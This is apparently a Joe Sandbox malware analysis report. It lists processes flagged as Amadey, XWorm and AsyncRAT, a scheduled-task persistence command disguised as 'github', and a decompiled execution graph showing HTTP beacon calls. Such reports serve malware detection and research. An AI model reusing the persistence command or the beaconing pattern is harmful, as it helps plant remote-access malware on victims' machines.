                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:12:08:13
                                                      Start date:30/11/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe"
                                                      Imagebase:0xe0000
                                                      File size:52'736 bytes
                                                      MD5 hash:EFD5937F50C21B5CE660D67F3F995821
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2443615567.00000000000E8000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2443615567.00000000000E8000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.2895978891.000000000254A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.2895978891.0000000002491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 55%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:12:08:15
                                                      Start date:30/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe"
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:12:08:15
                                                      Start date:30/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:12:08:17
                                                      Start date:30/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\github.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\github.exe
                                                      Imagebase:0x440000
                                                      File size:52'736 bytes
                                                      MD5 hash:EFD5937F50C21B5CE660D67F3F995821
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\github.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\github.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 55%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:12:08:29
                                                      Start date:30/11/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe"
                                                      Imagebase:0x7d0000
                                                      File size:1'723'904 bytes
                                                      MD5 hash:7AC5198E128DEDA55EEEB6CCFC8B57EA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000003.2616843347.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000003.2616843347.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.2621060775.00000000007D2000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000002.2621060775.00000000007D2000.00000040.00000001.01000000.0000000C.sdmp, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 32%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Reset < >
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1711669702.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c79388a2c4a240131a64083b821e622c495ffc1131eb303364d8988b9f006b6d
                                                        • Instruction ID: 6a1845b71c2be6f75ddfd011d5a8ecbf85ffe675044706a1dd2983090f135d01
                                                        • Opcode Fuzzy Hash: c79388a2c4a240131a64083b821e622c495ffc1131eb303364d8988b9f006b6d
                                                        • Instruction Fuzzy Hash: 10F0FEBB25C014BD7151D5826B299FA7BAEE5C2730771C837F943C4402D6A50A4EA231
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1711669702.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5faf10ca632b4f9db0fd3140c04ef3bab65d66f89af555ff8113783ec3056ca2
                                                        • Instruction ID: ce46bdcf97ec6fa1b7716ffd1cfe333b74c478f4ecdfd916938a7d7010935222
                                                        • Opcode Fuzzy Hash: 5faf10ca632b4f9db0fd3140c04ef3bab65d66f89af555ff8113783ec3056ca2
                                                        • Instruction Fuzzy Hash: BB01D6FB24C114BD6100E591AB2C9FB7BAEE1C2730331C93BF842C5402E2B64D4BA275
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1711669702.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2b41b4d9416ef71c3f37c8de930b3d77d8418f49f46dbc559b6758faede4c72
                                                        • Instruction ID: ea4975859d7c46580e23c3b2ccff9a3bffc1d8e03b76182fb644efbf23da2d47
                                                        • Opcode Fuzzy Hash: b2b41b4d9416ef71c3f37c8de930b3d77d8418f49f46dbc559b6758faede4c72
                                                        • Instruction Fuzzy Hash: 1F01F7BB64D190AEF30295611A6D9F67BEDE9C3231335887BF441C6803D25A0A4FE232

                                                        Execution Graph

                                                        Execution Coverage:12%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:9.4%
                                                        Total number of Nodes:1844
                                                        Total number of Limit Nodes:83
                                                        execution_graph 12341 fbb8b9 12348 fbb7b5 12341->12348 12343 fbb8e1 Concurrency::details::_Reschedule_chore 12345 fbb906 12343->12345 12356 fbcbae 12343->12356 12360 fbb718 12345->12360 12347 fbb91e 12349 fbb7c1 Concurrency::details::_Reschedule_chore 12348->12349 12350 fbc6ac GetSystemTimePreciseAsFileTime 12349->12350 12351 fbb7f2 12349->12351 12352 fbb7d6 12350->12352 12351->12343 12370 fa2b10 12352->12370 12354 fbb7dc __Mtx_unlock 12355 fa2b10 4 API calls 12354->12355 12355->12351 12357 fbcbcc 12356->12357 12358 fbcbbc TpCallbackUnloadDllOnCompletion 12356->12358 12357->12345 12358->12357 12361 fbb724 Concurrency::details::_Reschedule_chore 12360->12361 12362 fbb77e 12361->12362 12363 fbc6ac GetSystemTimePreciseAsFileTime 12361->12363 12362->12347 12364 fbb739 12363->12364 12365 fa2b10 4 API calls 12364->12365 12366 fbb73f __Mtx_unlock 12365->12366 12367 fa2b10 4 API calls 12366->12367 12368 fbb75c __Cnd_broadcast 12367->12368 12368->12362 12369 fa2b10 4 API calls 12368->12369 12369->12362 12371 fa2b1a 12370->12371 12372 fa2b1c 12370->12372 12371->12354 12373 fbc26a 4 API calls 12372->12373 12374 fa2b22 12373->12374 12375 fd38af ___std_exception_copy RtlAllocateHeap 12374->12375 12376 fa2b68 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12375->12376 12376->12354 12155 fa7430 12168 fb7a00 12155->12168 12157 fa7465 12158 fb7a00 RtlAllocateHeap 12157->12158 12159 fa7478 12158->12159 12160 fb7a00 RtlAllocateHeap 12159->12160 12161 fa7488 12160->12161 12162 fb7a00 RtlAllocateHeap 12161->12162 12163 fa749d 12162->12163 12164 fb7a00 RtlAllocateHeap 12163->12164 12165 fa74b2 12164->12165 12166 fb7a00 RtlAllocateHeap 12165->12166 12167 fa74c4 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12166->12167 12169 fb7a26 12168->12169 12170 fb7a2d 12169->12170 12171 fb7a62 12169->12171 12172 fb7a81 12169->12172 12170->12157 12173 fb7ab9 12171->12173 12174 fb7a69 12171->12174 12175 fbd3e2 RtlAllocateHeap 12172->12175 12178 fb7a6f __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 12172->12178 12187 fa2480 12173->12187 12179 fbd3e2 12174->12179 12175->12178 12178->12157 12182 fbd3e7 __fassign 12179->12182 12181 fbd401 12181->12178 12182->12181 12183 fa2480 std::_Xinvalid_argument 12182->12183 12191 fd8be1 12182->12191 12186 fbd40d std::_Xinvalid_argument 12183->12186 12195 fd38af 12183->12195 12185 fa24c3 12185->12178 12186->12178 12188 fa248e std::_Xinvalid_argument 12187->12188 12189 fd38af ___std_exception_copy RtlAllocateHeap 12188->12189 12190 fa24c3 12189->12190 12190->12178 12194 fdb04b __fassign 12191->12194 12192 fdb074 RtlAllocateHeap 12193 fdb087 __dosmaperr 12192->12193 12192->12194 12193->12182 12194->12192 12194->12193 12196 fd38d9 ___std_exception_copy 12195->12196 12197 fd38bc 12195->12197 12196->12185 12197->12196 12198 fd8be1 ___std_exception_copy RtlAllocateHeap 12197->12198 12198->12196 14001 fa91b0 14002 fa91e5 14001->14002 14003 fb80c0 RtlAllocateHeap 14002->14003 14004 fa9218 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14003->14004 14011 fa7990 14012 fb7a00 RtlAllocateHeap 14011->14012 14013 fa79db 14012->14013 14014 fa5c10 4 API calls 14013->14014 14015 fa79e3 14014->14015 14016 fb8320 RtlAllocateHeap 14015->14016 14017 fa79f3 14016->14017 14018 fb7a00 RtlAllocateHeap 14017->14018 14019 fa7a0e 14018->14019 14020 fa5c10 4 API calls 14019->14020 14021 fa7a15 14020->14021 14022 fb80c0 RtlAllocateHeap 14021->14022 14024 fa7a38 shared_ptr 14022->14024 14023 fa7aa5 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14024->14023 14045 fa6d70 14024->14045 14026 fa7b1b shared_ptr 14027 fb7a00 RtlAllocateHeap 14026->14027 14035 fa7c06 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14026->14035 14028 fa7b75 14027->14028 14029 fa5c10 4 API calls 14028->14029 14030 fa7b7d 14029->14030 14031 fb7a00 RtlAllocateHeap 14030->14031 14032 fa7b98 14031->14032 14033 fa5c10 4 API calls 14032->14033 14034 fa7ba0 14033->14034 14036 fb8320 RtlAllocateHeap 14034->14036 14037 fa7bb1 14036->14037 14038 fb8220 RtlAllocateHeap 14037->14038 14039 fa7bc1 14038->14039 14040 fb7a00 RtlAllocateHeap 14039->14040 14041 fa7bdc 14040->14041 14042 fa5c10 4 API calls 14041->14042 14043 fa7be3 14042->14043 14044 fb80c0 RtlAllocateHeap 14043->14044 14044->14035 14046 fa6db0 14045->14046 14047 fa6dca 14046->14047 14048 fa6df5 14046->14048 14049 fb80c0 RtlAllocateHeap 14047->14049 14050 fb80c0 RtlAllocateHeap 14048->14050 14051 fa6deb shared_ptr 14049->14051 14050->14051 14051->14026 14057 fa8b30 14058 fa8b7c 14057->14058 14059 fb7a00 RtlAllocateHeap 14058->14059 14060 fa8b8c 14059->14060 14061 fa5c10 4 API calls 14060->14061 14062 fa8b97 14061->14062 14063 fb80c0 RtlAllocateHeap 14062->14063 14064 fa8be3 14063->14064 14065 fb80c0 RtlAllocateHeap 14064->14065 14066 fa8c35 14065->14066 14067 fb8220 RtlAllocateHeap 14066->14067 14068 fa8c47 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14067->14068 12377 fb6c70 12381 fb6ca0 12377->12381 12378 fa5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12378->12381 12379 fb7a00 RtlAllocateHeap 12379->12381 12381->12378 12381->12379 12382 fb47b0 12381->12382 12383 fb47eb 12382->12383 12462 fb4e70 shared_ptr 12382->12462 12385 fb7a00 RtlAllocateHeap 12383->12385 12383->12462 12384 fb4f59 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12384->12381 12386 fb480c 12385->12386 12642 fa5c10 12386->12642 12388 fb4813 12390 fb7a00 RtlAllocateHeap 12388->12390 12391 fb4825 12390->12391 12393 fb7a00 RtlAllocateHeap 12391->12393 12392 fb5015 12722 fa6950 12392->12722 12395 fb4837 12393->12395 12649 fabe30 12395->12649 12397 fb4843 12399 fb7a00 RtlAllocateHeap 12397->12399 12398 fb50de shared_ptr 12732 fa7d30 12398->12732 12403 fb4858 12399->12403 12401 fb50ed 12811 fa45b0 12401->12811 12402 fb5025 shared_ptr 12402->12398 12439 fb6c46 12402->12439 12405 fb7a00 RtlAllocateHeap 12403->12405 12407 fb4870 12405->12407 12406 fb50fa 12815 fa8380 12406->12815 12409 fa5c10 4 API calls 12407->12409 12411 fb4877 12409->12411 12410 fb5106 12412 fa45b0 RtlAllocateHeap 12410->12412 12673 fa8580 12411->12673 12414 fb5113 12412->12414 12419 fa45b0 RtlAllocateHeap 12414->12419 12415 fb4883 12416 fb7a00 RtlAllocateHeap 12415->12416 12499 fb4afd 12415->12499 12421 fb489f 12416->12421 12417 fb7a00 RtlAllocateHeap 12418 fb4b2f 12417->12418 12423 fb7a00 RtlAllocateHeap 12418->12423 12424 fb5130 12419->12424 12420 fb7a00 RtlAllocateHeap 12420->12439 12422 fb7a00 RtlAllocateHeap 12421->12422 12425 fb48b7 12422->12425 12426 fb4b44 12423->12426 12427 fb7a00 RtlAllocateHeap 12424->12427 12429 fa5c10 4 API calls 12425->12429 12430 fb7a00 RtlAllocateHeap 12426->12430 12431 fb514e 12427->12431 12428 fa5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12428->12439 12432 fb48be 12429->12432 12433 fb4b56 12430->12433 12434 fa5c10 4 API calls 12431->12434 12436 fa8580 RtlAllocateHeap 12432->12436 12437 fabe30 10 API calls 12433->12437 12438 fb5155 12434->12438 12435 fb47b0 14 API calls 12435->12439 12440 fb48ca 12436->12440 12441 fb4b62 12437->12441 12442 fb7a00 RtlAllocateHeap 12438->12442 12439->12420 12439->12428 12439->12435 12446 fb7a00 RtlAllocateHeap 12440->12446 12440->12499 12444 fb7a00 RtlAllocateHeap 12441->12444 12443 fb516a 12442->12443 12445 fa5c10 4 API calls 12443->12445 12447 fb4b77 12444->12447 12454 fb5171 12445->12454 12448 fb48e7 12446->12448 12449 fb7a00 RtlAllocateHeap 12447->12449 12450 fa5c10 4 API calls 12448->12450 12451 fb4b8f 12449->12451 12456 fb48ef 12450->12456 12452 fa5c10 4 API calls 12451->12452 12453 fb4b96 12452->12453 12455 fa8580 RtlAllocateHeap 12453->12455 12460 fb80c0 RtlAllocateHeap 12454->12460 12457 fb4ba2 12455->12457 12458 fb80c0 RtlAllocateHeap 12456->12458 12459 fb7a00 RtlAllocateHeap 12457->12459 12457->12462 12468 fb4959 shared_ptr 12458->12468 12461 fb4bbe 12459->12461 12469 fb51ed 12460->12469 12463 fb7a00 RtlAllocateHeap 12461->12463 12462->12384 12700 fa65e0 12462->12700 12464 fb4bd6 12463->12464 12465 fa5c10 4 API calls 12464->12465 12467 fb4bdd 12465->12467 12466 fb7a00 RtlAllocateHeap 12470 fb49e6 12466->12470 12472 fa8580 RtlAllocateHeap 12467->12472 12468->12466 12827 fb7de0 12469->12827 12471 fa5c10 4 API calls 12470->12471 12479 fb49ee 12471->12479 12475 fb4be9 12472->12475 12474 fb5259 12840 fb7760 12474->12840 12475->12462 12478 fb7a00 RtlAllocateHeap 12475->12478 12477 fb52b8 12491 fb5335 shared_ptr 12477->12491 12867 fb8ca0 12477->12867 12480 fb4c06 12478->12480 12481 fb80c0 RtlAllocateHeap 12479->12481 12482 fa5c10 4 API calls 12480->12482 12487 fb4a49 shared_ptr 12481->12487 12484 fb4c0e 12482->12484 12485 fb4c5a 12484->12485 12486 fb4f97 12484->12486 12490 fb80c0 RtlAllocateHeap 12485->12490 12861 fb8200 12486->12861 12487->12499 12852 fa98f0 12487->12852 12500 fb4c78 shared_ptr 12490->12500 12493 fb80c0 RtlAllocateHeap 12491->12493 12492 fb4f9c 12864 fbc1d9 12492->12864 12505 fb53fd shared_ptr 12493->12505 12495 fb4ad5 __dosmaperr 12495->12499 12857 fd8ab6 12495->12857 12496 fb7a00 RtlAllocateHeap 12498 fb4d05 12496->12498 12501 fa5c10 4 API calls 12498->12501 12499->12417 12499->12492 12500->12462 12500->12496 12508 fb4d0d 12501->12508 12502 fa45b0 RtlAllocateHeap 12503 fb549d 12502->12503 12504 fb7a00 RtlAllocateHeap 12503->12504 12506 fb54b7 12504->12506 12505->12502 12507 fa5c10 4 API calls 12506->12507 12509 fb54c2 12507->12509 12510 fb80c0 RtlAllocateHeap 12508->12510 12511 fa45b0 RtlAllocateHeap 12509->12511 12514 fb4d68 shared_ptr 12510->12514 12512 fb54d7 12511->12512 12513 fb7a00 RtlAllocateHeap 12512->12513 12516 fb54eb 12513->12516 12514->12462 12515 fb7a00 RtlAllocateHeap 12514->12515 12517 fb4df7 12515->12517 12518 fa5c10 4 API calls 12516->12518 12519 fb7a00 RtlAllocateHeap 12517->12519 12520 fb54f6 12518->12520 12521 fb4e0c 12519->12521 12522 fb7a00 RtlAllocateHeap 12520->12522 12523 fb7a00 RtlAllocateHeap 12521->12523 12524 fb5514 12522->12524 12525 fb4e27 12523->12525 12526 fa5c10 4 API calls 12524->12526 12527 fa5c10 4 API calls 12525->12527 12528 fb551f 12526->12528 12529 fb4e2e 12527->12529 12530 fb7a00 RtlAllocateHeap 12528->12530 12533 fb80c0 RtlAllocateHeap 12529->12533 12531 fb553d 12530->12531 12532 fa5c10 4 API calls 12531->12532 12534 fb5548 12532->12534 12535 fb4e67 12533->12535 12536 fb7a00 RtlAllocateHeap 12534->12536 12679 fb4390 12535->12679 12538 fb5566 12536->12538 12539 fa5c10 4 API calls 12538->12539 12540 fb5571 12539->12540 12541 fb7a00 RtlAllocateHeap 12540->12541 12542 fb558f 12541->12542 12543 fa5c10 4 API calls 12542->12543 12544 fb559a 12543->12544 12545 fb7a00 RtlAllocateHeap 12544->12545 12546 fb55b8 12545->12546 12547 fa5c10 4 API calls 12546->12547 12548 fb55c3 12547->12548 12549 fb7a00 RtlAllocateHeap 12548->12549 12550 fb55e1 12549->12550 12551 fa5c10 4 API calls 12550->12551 12552 fb55ec 12551->12552 12553 fb7a00 RtlAllocateHeap 12552->12553 12554 fb560a 12553->12554 12555 fa5c10 4 API calls 12554->12555 12556 fb5615 12555->12556 12557 fb7a00 RtlAllocateHeap 12556->12557 12558 fb5631 12557->12558 12559 fa5c10 4 API calls 12558->12559 12560 fb563c 12559->12560 12561 fb7a00 RtlAllocateHeap 12560->12561 12562 fb5653 12561->12562 12563 fa5c10 4 API calls 12562->12563 12564 fb565e 12563->12564 12565 fb7a00 RtlAllocateHeap 12564->12565 12566 fb5675 12565->12566 12567 fa5c10 4 API calls 12566->12567 12568 fb5680 12567->12568 12569 fb7a00 RtlAllocateHeap 12568->12569 12570 fb569c 12569->12570 12571 fa5c10 4 API calls 12570->12571 12572 fb56a7 12571->12572 12879 fb8320 12572->12879 12574 fb56bb 12883 fb8220 12574->12883 12576 fb56cf 12577 fb8220 RtlAllocateHeap 12576->12577 12578 fb56e3 12577->12578 12579 fb8220 RtlAllocateHeap 12578->12579 12580 fb56f7 12579->12580 12581 fb8320 RtlAllocateHeap 12580->12581 12582 fb570b 12581->12582 12583 fb8220 RtlAllocateHeap 12582->12583 12584 fb571f 12583->12584 12585 fb8320 RtlAllocateHeap 12584->12585 12586 fb5733 12585->12586 12587 fb8220 RtlAllocateHeap 12586->12587 12588 fb5747 12587->12588 12589 fb8320 RtlAllocateHeap 12588->12589 12590 fb575b 12589->12590 12591 fb8220 RtlAllocateHeap 12590->12591 12592 fb576f 12591->12592 12593 fb8320 RtlAllocateHeap 12592->12593 12594 fb5783 12593->12594 12595 fb8220 RtlAllocateHeap 12594->12595 12596 fb5797 12595->12596 12597 fb8320 RtlAllocateHeap 12596->12597 12598 fb57ab 12597->12598 12599 fb8220 RtlAllocateHeap 12598->12599 12600 fb57bf 12599->12600 12601 fb8320 RtlAllocateHeap 12600->12601 12602 fb57d3 12601->12602 12603 fb8220 RtlAllocateHeap 12602->12603 12604 fb57e7 12603->12604 12605 fb8320 RtlAllocateHeap 12604->12605 12606 fb57fb 12605->12606 12607 fb8220 RtlAllocateHeap 12606->12607 12608 fb580f 12607->12608 12609 fb8320 RtlAllocateHeap 12608->12609 12610 fb5823 12609->12610 12611 fb8220 RtlAllocateHeap 12610->12611 12612 fb5837 12611->12612 12613 fb8220 RtlAllocateHeap 12612->12613 12614 fb584b 12613->12614 12615 fb8220 RtlAllocateHeap 12614->12615 12616 fb585f 12615->12616 12617 fb8320 RtlAllocateHeap 12616->12617 12618 fb5873 shared_ptr 12617->12618 12619 fb665b 12618->12619 12620 fb6507 12618->12620 12621 fb7a00 RtlAllocateHeap 12619->12621 12622 fb7a00 RtlAllocateHeap 12620->12622 12623 fb6670 12621->12623 12624 fb651d 12622->12624 12626 fb7a00 RtlAllocateHeap 12623->12626 12625 fa5c10 4 API calls 12624->12625 12627 fb6528 12625->12627 12628 fb6685 12626->12628 12629 fb8320 RtlAllocateHeap 12627->12629 12891 fa49a0 12628->12891 12641 fb653c shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12629->12641 12631 fb6694 12632 fb7760 RtlAllocateHeap 12631->12632 12638 fb66db 12632->12638 12633 fb67d6 12634 fb7a00 RtlAllocateHeap 12633->12634 12635 fb67ec 12634->12635 12637 fa5c10 4 API calls 12635->12637 12636 fb8ca0 RtlAllocateHeap 12636->12638 12639 fb67f7 12637->12639 12638->12633 12638->12636 12640 fb8220 RtlAllocateHeap 12639->12640 12640->12641 12641->12381 12898 fa5940 12642->12898 12646 fa5c6a 12917 fa4b30 12646->12917 12648 fa5c7b shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12648->12388 12650 fabe82 12649->12650 12651 fac281 12649->12651 12650->12651 12653 fabe96 Sleep InternetOpenW InternetConnectA 12650->12653 12652 fb80c0 RtlAllocateHeap 12651->12652 12658 fac22e shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12652->12658 12654 fb7a00 RtlAllocateHeap 12653->12654 12655 fabf18 12654->12655 12656 fa5c10 4 API calls 12655->12656 12657 fabf23 HttpOpenRequestA 12656->12657 12660 fabf4c shared_ptr 12657->12660 12658->12397 12661 fb7a00 RtlAllocateHeap 12660->12661 12662 fabfb4 12661->12662 12663 fa5c10 4 API calls 12662->12663 12664 fabfbf 12663->12664 12665 fb7a00 RtlAllocateHeap 12664->12665 12666 fabfd8 12665->12666 12667 fa5c10 4 API calls 12666->12667 12668 fabfe3 HttpSendRequestA 12667->12668 12671 fac006 shared_ptr 12668->12671 12670 fac08e InternetReadFile 12672 fac0b5 12670->12672 12671->12670 12677 fa86a0 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12673->12677 12678 fa85d5 shared_ptr 12673->12678 12674 fa8767 12676 fb8200 RtlAllocateHeap 12674->12676 12675 fb80c0 RtlAllocateHeap 12675->12678 12676->12677 12677->12415 12678->12674 12678->12675 12678->12677 12680 fb7a00 RtlAllocateHeap 12679->12680 12681 fb43d2 12680->12681 12682 fb7a00 RtlAllocateHeap 12681->12682 12683 fb43e4 12682->12683 12684 fa8580 RtlAllocateHeap 12683->12684 12685 fb43ed 12684->12685 12686 fb4646 12685->12686 12698 fb43f8 shared_ptr 12685->12698 12687 fb7a00 RtlAllocateHeap 12686->12687 12688 fb4657 12687->12688 12689 fb7a00 RtlAllocateHeap 12688->12689 12691 fb466c 12689->12691 12690 fb80c0 RtlAllocateHeap 12690->12698 12692 fb7a00 RtlAllocateHeap 12691->12692 12694 fb467e 12692->12694 12696 fb3640 12 API calls 12694->12696 12695 fb4610 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12695->12462 12696->12695 12697 fb7a00 RtlAllocateHeap 12697->12698 12698->12690 12698->12695 12698->12697 12973 fb9280 12698->12973 12978 fb3640 12698->12978 12701 fa663f 12700->12701 12702 fb7a00 RtlAllocateHeap 12701->12702 12703 fa66a6 12702->12703 12704 fa5c10 4 API calls 12703->12704 12705 fa66b1 12704->12705 12706 fa22c0 3 API calls 12705->12706 12707 fa66c9 shared_ptr 12706->12707 12708 fb7a00 RtlAllocateHeap 12707->12708 12719 fa68e3 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12707->12719 12709 fa6732 12708->12709 12710 fa5c10 4 API calls 12709->12710 12711 fa673d 12710->12711 12712 fa22c0 3 API calls 12711->12712 12721 fa6757 shared_ptr 12712->12721 12713 fa6852 12714 fb80c0 RtlAllocateHeap 12713->12714 12716 fa689c 12714->12716 12715 fb7a00 RtlAllocateHeap 12715->12721 12717 fb80c0 RtlAllocateHeap 12716->12717 12717->12719 12718 fa5c10 4 API calls 12718->12721 12719->12392 12720 fa22c0 3 API calls 12720->12721 12721->12713 12721->12715 12721->12718 12721->12719 12721->12720 12723 fa6ca1 12722->12723 12731 fa69c8 shared_ptr 12722->12731 12724 fa6d63 12723->12724 12725 fa6cc4 12723->12725 12727 fb8200 RtlAllocateHeap 12724->12727 12726 fb80c0 RtlAllocateHeap 12725->12726 12729 fa6ce3 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12726->12729 12727->12729 12728 fb80c0 RtlAllocateHeap 12728->12731 12729->12402 12730 fb9280 RtlAllocateHeap 12730->12731 12731->12723 12731->12724 12731->12728 12731->12729 12731->12730 12733 fa7d96 __cftof 12732->12733 12734 fb7a00 RtlAllocateHeap 12733->12734 12766 fa7ee8 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12733->12766 12735 fa7dc7 12734->12735 12736 fa5c10 4 API calls 12735->12736 12737 fa7dd2 12736->12737 12738 fb7a00 RtlAllocateHeap 12737->12738 12739 fa7df4 12738->12739 12740 fa5c10 4 API calls 12739->12740 12742 fa7dff shared_ptr 12740->12742 12741 fa7ed3 GetNativeSystemInfo 12743 fa7ed7 12741->12743 12742->12741 12742->12743 12742->12766 12744 fa8019 12743->12744 12745 fa7f3f 12743->12745 12743->12766 12746 fb7a00 RtlAllocateHeap 12744->12746 12747 fb7a00 RtlAllocateHeap 12745->12747 12748 fa8045 12746->12748 12749 fa7f60 12747->12749 12750 fa5c10 4 API calls 12748->12750 12751 fa5c10 4 API calls 12749->12751 12752 fa804c 12750->12752 12753 fa7f67 12751->12753 12754 fb7a00 RtlAllocateHeap 12752->12754 12755 fb7a00 RtlAllocateHeap 12753->12755 12757 fa8064 12754->12757 12756 fa7f7f 12755->12756 12758 fa5c10 4 API calls 12756->12758 12759 fa5c10 4 API calls 12757->12759 12761 fa7f86 12758->12761 12760 fa806b 12759->12760 12762 fb7a00 RtlAllocateHeap 12760->12762 13711 